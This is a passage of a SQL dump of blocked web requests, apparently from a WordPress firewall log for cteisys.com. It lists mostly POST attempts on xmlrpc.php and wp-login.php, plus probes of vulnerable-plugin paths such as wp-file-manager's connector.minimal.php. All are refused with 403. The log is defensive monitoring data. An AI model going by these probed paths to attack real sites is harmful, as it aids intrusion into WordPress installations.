AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','ojZ93s5OqpYnlAaVGtbRz8Ww',0,1664369989.9321,15336,'','POST',403,0,515,0,1,'',0),('92.204.239.68',1556934468,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','LumKGXVYrEgzcMN1JFWawP4U',0,1664370001.9066,3729,'','POST',403,0,515,0,1,'',0),('128.199.195.166',2160575398,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','cmHg1zWtVC6khjopEJKAPGwn',0,1664370023.1027,523,'','POST',403,0,515,0,1,'',0),('194.36.111.59',3257167675,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','DcB8q4XoApCHxWGEsly70IZf',0,1664370293.1476,18514,'','POST',403,0,515,0,1,'',0),('137.184.117.52',2310567220,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','1l36E9KaUy4kTuz8NpdmZQA2',0,1664370432.7252,1375,'','POST',403,0,600,0,1,'',0),('13.81.59.92',223427420,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','N4KTHLBdYmVJ0xAhjokcP5U2',0,1664370456.6449,562,'','POST',403,0,600,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','UZItJM0hjFqdpfwORgHzPLV6',0,1664371586.6362,10236,'','POST',403,0,600,0,1,'',0),('67.227.159.220',1138991068,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','3g2fKzbkM6TJwQrBvtqsGElV',0,1664371579.7949,18162,'','POST',403,0,515,0,1,'',0),('160.16.210.199',2685457095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','INLJeZa8j6bxTdWAoyXUCV1O',0,1664371580.2938,17676,'','POST',403,0,515,0,1,'',0),('89.46.106.142',1496214158,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','27JoGH5LAUfp1gnYWju69hSt',0,1664371577.9194,20075,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Yrxj9HUJc07qX1Rdht4wTfLA',0,1664371603.2325,984,'','POST',403,0,515,0,1,'',0),('47.110.72.238',795756782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','U6PhbxF2AL154jSNWIfKYwiH',0,1664371610.4335,1372,'','POST',403,0,600,0,1,'',0),('81.88.53.33',1364735265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','QNoz36GbYxeLcJmWwaU598yk',0,1664371624.8485,664,'','POST',403,0,515,0,1,'',0),('185.58.73.254',3107604990,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','pymh4jVXo3qkSu7AZPbwg690',0,1664371632.2530,576,'','POST',403,0,515,0,1,'',0),('66.97.33.13',1113661709,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','F19kHbgYDEajOhysBRiS86mK',0,1664371635.0201,583,'','POST',403,0,515,0,1,'',0),('165.140.71.65',2777433921,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','8hcV4WkiRFb0fZTJrAoXIqMY',0,1664371643.3977,591,'','POST',403,0,515,0,1,'',0),('205.185.116.156',3451483292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','pVFIAn6afYe2q4kKGsPSiO8l',0,1664372639.2806,17198,'','POST',403,0,600,0,1,'',0),('103.149.154.8',1737857544,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','5Xb3CfskRGHy7Ia8dwEWjV1J',0,1664372736.5024,1329,'','POST',403,0,600,0,1,'',0),('36.94.142.166',610176678,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.140 Safari\\/537.36\"}','kMOCgJV2WGrzZRY5wNH6qtXI',0,1664372761.7433,704,'','POST',403,0,600,0,1,'',0),('209.141.44.126',3515690110,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','9jzrv41sJIqmpn2EPfaVGiFW',0,1664372862.9594,1245,'','POST',403,0,600,0,1,'',0),('185.2.6.12',3103917580,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','vl1w5tnSdTiQPsNbuH8qf3y2',0,1664373642.6508,17544,'','POST',403,0,515,0,1,'',0),('43.239.110.241',737111793,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','Z6Fto2BnHdEKXqUOyN3MQv84',0,1664373650.7581,9637,'','POST',403,0,515,0,1,'',0),('178.128.2.114',2994733682,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','XiuB6Ad1v72ahjDm8So0LUpQ',0,1664373660.5215,1142,'','POST',403,0,515,0,1,'',0),('97.74.82.165',1632260773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','JSiGhRKtLzQfCYT30jsAxEV6',0,1664373668.0457,499,'','POST',403,0,515,0,1,'',0),('178.210.84.161',3000128673,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','82wfn3XCSo5sBgVENtLKzUbj',0,1664373672.6384,1148,'','POST',403,0,515,0,1,'',0),('148.72.232.31',2487805983,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','Bg5KOs1XZ7ezNchPI9EMnw6S',0,1664373673.3165,904,'','POST',403,0,515,0,1,'',0),('178.128.2.114',2994733682,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','DK85dy7nqHPjIfBJuwLMk4m1',0,1664373683.8558,533,'','POST',403,0,515,0,1,'',0),('43.153.25.22',731453718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','XeRhq0VrlsNfPOdx96wnT7My',0,1664373689.9324,780,'','POST',403,0,515,0,1,'',0),('66.97.33.13',1113661709,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','SOswn2ch86f7NIedXLDrm9ji',0,1664373690.8208,602,'','POST',403,0,515,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','KOUf5Z6CSvQEJVuX8AgH9xer',0,1664373890.3144,1301,'','POST',403,0,600,0,1,'',0),('212.103.4.29',3563521053,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','DUoCM1BWLSyf8POukNxIlHaY',0,1664373915.4075,821,'','POST',403,0,600,0,1,'',0),('152.89.196.13',2556019725,'','http://cteisys.com/wp-content/plugins/wp-members-master/widget-tag.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','eaIltS9V3gEQCfH6hzTYrpAB',0,1664373922.5806,288,'','POST',403,0,700,0,1,'',0),('107.167.244.83',1806169171,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Zw8h6YEHf1Tbmk5CIJuLac9d',0,1664374466.9123,18493,'','POST',403,0,515,0,1,'',0),('128.199.100.142',2160551054,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','WH1X3T7Zbc0BOCizjNoLyqxS',0,1664375058.1320,1422,'','POST',403,0,600,0,1,'',0),('207.154.250.8',3483040264,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','aebAXT28L3iy4cfoxn06MN9Z',0,1664375077.5351,508,'','POST',403,0,600,0,1,'',0),('146.70.61.131',2454076803,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','6MNjzihRbH5XB2YvTq8nyFd9',0,1664375408.3349,2942,'','POST',403,0,515,0,1,'',0),('188.165.198.224',3164980960,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','RFdQnW5z06jhIBrXOaKPqHuN',0,1664376204.5563,18169,'','POST',403,0,600,0,1,'',0),('54.38.73.235',908478955,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/58.0.3029.110 Safari\\/537.36\"}','jW4N3VBEx90gkUP2uerAvct5',0,1664376228.5059,520,'','POST',403,0,600,0,1,'',0),('178.128.2.114',2994733682,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','tNrsePhqEg6SOJCf4xZoD7YM',0,1664376354.3670,2306,'','POST',403,0,515,0,1,'',0),('207.180.235.153',3484740505,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','jNOsUEw9rY6iMKWufqlc5hyo',0,1664376356.7121,556,'','POST',403,0,515,0,1,'',0),('1.117.168.227',24488163,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','OI7L02HV9jJh1UCSTZEr36us',0,1664376936.4793,1355,'','POST',403,0,515,0,1,'',0),('178.239.172.7',3002051591,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','Vf0U7x2wBjKFi9IyEAm1W4QS',0,1664376952.2358,1276,'','POST',403,0,515,0,1,'',0),('148.72.232.31',2487805983,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','7rz1ypXNkbqBwTDIJR2YGhsj',0,1664376959.6295,518,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','ps8wBOVfX4DyZtcPvmzhFHGC',0,1664377008.2647,1336,'','POST',403,0,515,0,1,'',0),('160.16.210.199',2685457095,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','KtpjwMu4XgQBDOkdR39aJFlW',0,1664377013.2541,508,'','POST',403,0,515,0,1,'',0),('185.107.113.160',3110826400,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','cLGdsTg2uvhRmtJzH9o53PqI',0,1664377017.2997,478,'','POST',403,0,515,0,1,'',0),('51.89.228.130',861529218,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','giZcPXWqKo3StHUwI8uxFCNG',0,1664377021.2785,508,'','POST',403,0,515,0,1,'',0),('43.153.25.22',731453718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','fsY36pW8io54VLUJORcdljqz',0,1664377022.2424,684,'','POST',403,0,515,0,1,'',0),('65.52.67.200',1093944264,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','JeOzW0QkvnRsGcgDXHTKl3Sw',0,1664377025.4182,495,'','POST',403,0,515,0,1,'',0),('212.91.94.100',3562757732,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','mwPXRQd1zqvx4NHLSl0iEaFe',0,1664377029.6498,505,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','8Sl7kAbNFimgqI2G1prC3KRU',0,1664377030.7697,535,'','POST',403,0,515,0,1,'',0),('137.74.94.65',2303352385,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','Y2pxwFnRQEWsH18Mvjhm35eS',0,1664377036.0529,542,'','POST',403,0,515,0,1,'',0),('34.91.106.237',576416493,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','7w6boFDB81QtrhOl93qMaXie',0,1664377038.5031,1300,'','POST',403,0,515,0,1,'',0),('81.88.53.33',1364735265,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','wfnr2vSCU9oeK6NQD0WGdhJ8',0,1664377038.7114,1192,'','POST',403,0,515,0,1,'',0),('41.78.241.66',693039426,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','467VEqGinPaU3csMjh9mtx8v',0,1664377043.5128,477,'','POST',403,0,515,0,1,'',0),('167.71.184.141',2806495373,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','0hwqgyOGlH76AaxJiTZoVj1N',0,1664387149.8008,510,'','POST',403,0,515,0,1,'',0),('51.89.228.130',861529218,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','xLdJM9vb3HSqrzOofVNRFAXP',0,1664387157.1033,479,'','POST',403,0,515,0,1,'',0),('103.27.63.56',1729838904,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','NYSE4javnWtD1iqzCFf86scm',0,1664387161.0068,517,'','POST',403,0,515,0,1,'',0),('36.92.166.178',610051762,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','3G7FNYZSXmDuMzdstIWPKR50',0,1664387166.1971,479,'','POST',403,0,515,0,1,'',0),('142.93.48.70',2388471878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','wKPoJXmWN3HtQ7ra6sf091AS',0,1664387184.3063,586,'','POST',403,0,515,0,1,'',0),('3.111.174.159',57650847,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','voutbLC2aF8jHIYRhxNpeWJn',0,1664389286.3932,10348,'','POST',403,0,515,0,1,'',0),('45.252.248.52',771553332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','92rm4PeqOfxN0oYb3XVEu7Mn',0,1664389278.6505,18116,'','POST',403,0,515,0,1,'',0),('51.89.228.130',861529218,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','K8ihOqRrlLXb6tVoJEk1zmwZ',0,1664389309.7036,1235,'','POST',403,0,515,0,1,'',0),('162.240.60.255',2733653247,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','5Hzs0dh9WKkUtT7Pwu8FEpbV',0,1664389315.0601,506,'','POST',403,0,515,0,1,'',0),('97.74.82.165',1632260773,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','PxV39Lj7IpcZevqMbhSzn4gs',0,1664389325.1337,484,'','POST',403,0,515,0,1,'',0),('185.2.6.12',3103917580,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','c7YCvQoLReg3DOFGHWJyP1aw',0,1664389328.9799,523,'','POST',403,0,515,0,1,'',0),('107.189.6.184',1807550136,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','6b1oQ4nguI5mpks0ROEhNPGd',0,1664389477.5713,1411,'','POST',403,0,600,0,1,'',0),('133.18.25.1',2232555777,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','ivI8wRrbFflaCK6GtBD5WnS1',0,1664390342.8340,16537,'','POST',403,0,515,0,1,'',0),('62.234.92.73',1055546441,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','xFHqkt3eh7VpSGTWIMd5ugJR',0,1664390339.7803,19600,'','POST',403,0,515,0,1,'',0),('185.2.6.12',3103917580,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','RId3qBeQXtD4wkLJNhVGZ65c',0,1664390355.6822,3823,'','POST',403,0,515,0,1,'',0),('92.205.10.44',1556941356,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','FC95nigbLGws6qok7Bp4J0WT',0,1664390367.2373,664,'','POST',403,0,515,0,1,'',0),('162.0.220.27',2717965339,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','I1dhN2tnkH85zL6axWrmKYps',0,1664390370.0453,1155,'','POST',403,0,515,0,1,'',0),('142.93.48.70',2388471878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','IVzRcAX2LO3tox5QrhqKlp1f',0,1664390370.5013,904,'','POST',403,0,515,0,1,'',0),('104.37.174.38',1747299878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','dePlQ7JrAb0jMGgHS43xEBwN',0,1664390375.6530,532,'','POST',403,0,515,0,1,'',0),('85.128.143.33',1434488609,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','02XwtTIVqRKHGo5JiWheEmvZ',0,1664390382.4757,474,'','POST',403,0,515,0,1,'',0),('85.128.143.30',1434488606,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','KzApRkvyuniTaeCNH7UYQgm6',0,1664390387.0010,1230,'','POST',403,0,515,0,1,'',0),('185.156.174.27',3114053147,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','elgS3B47wREvKzOmhdtW2rjM',0,1664391196.6566,18160,'','POST',403,0,515,0,1,'',0),('46.183.216.163',783800483,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','EkmPOdG5ShyZnTUqiRNjJB4M',0,1664391549.0903,11583,'','POST',403,0,515,0,1,'',0),('213.152.161.85',3583549781,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','AxdPCWJEIqL5NXG9ZzRYs8Hj',0,1664392402.4711,18489,'','POST',403,0,515,0,1,'',0),('147.78.47.249',2471374841,'','http://cteisys.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/105.0.0.0 Safari\\/537.36\"}','BYH9LgkKShDZOl4tF5Q7NCXU',0,1664392788.7098,356,'','GET',403,0,700,0,1,'',0),('36.92.166.178',610051762,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','pFoV3rcJBZY64UmOkstzjGLS',0,1664393713.7136,2629,'','POST',403,0,515,0,1,'',0),('68.183.26.89',1152850521,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','jEnTgDVmC5yBXK2F6c73vpW8',0,1664393721.9149,997,'','POST',403,0,515,0,1,'',0),('116.202.117.198',1959425478,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','SfwAeR6UGx5qu7riJCoyTvBH',0,1664393722.2061,900,'','POST',403,0,515,0,1,'',0),('142.93.48.70',2388471878,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','ZLN1IS6BGWjuXQqzExdabetV',0,1664393726.3569,528,'','POST',403,0,515,0,1,'',0),('36.92.166.178',610051762,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','wmh64VbWSGu23KLkOsUA0i1Q',0,1664393735.8277,485,'','POST',403,0,515,0,1,'',0),('54.37.156.2',908434434,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; 